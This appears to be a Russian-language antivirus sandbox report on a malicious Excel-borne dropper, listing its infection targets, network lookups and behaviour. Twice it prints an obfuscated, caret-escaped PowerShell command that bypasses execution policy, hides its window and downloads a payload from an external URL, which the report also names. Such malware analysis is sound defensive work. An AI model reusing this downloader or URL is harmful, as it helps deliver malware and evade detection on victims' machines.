Техническая информация
Для обеспечения автозапуска и распространения
Заражает следующие исполняемые файлы
- %ProgramFiles(x86)%\microsoft office\office16\excel.exe
Вредоносные функции
Загружает и запускает на исполнение
- http://ltmp.nonflets.pl/file/hen.trf как %appdata%.exe
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /C "pOwErsH^elL.EX^E -E^Xe^CuT^iO^N^p^ol^i^cy ^By^p^AsS -^N^oP^r^oFIle^ -^W^Indo^WS^T^Y^Le^ H^Idde^n (^ne^w^-^oBje^C^t ^Sys^TE^m.N^E^T.wEbC^li^e^nT^)^.^do^wNl^oaD^F^I^lE^(^'http://ltmp...
Сетевая активность
UDP
- DNS ASK lt##.#onflets.pl
Другое
Ищет следующие окна
- ClassName: 'OleMainThreadWndClass' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /C "pOwErsH^elL.EX^E -E^Xe^CuT^iO^N^p^ol^i^cy ^By^p^AsS -^N^oP^r^oFIle^ -^W^Indo^WS^T^Y^Le^ H^Idde^n (^ne^w^-^oBje^C^t ^Sys^TE^m.N^E^T.wEbC^li^e^nT^)^.^do^wNl^oaD^F^I^lE^(^'http://ltmp...' (со скрытым окном)
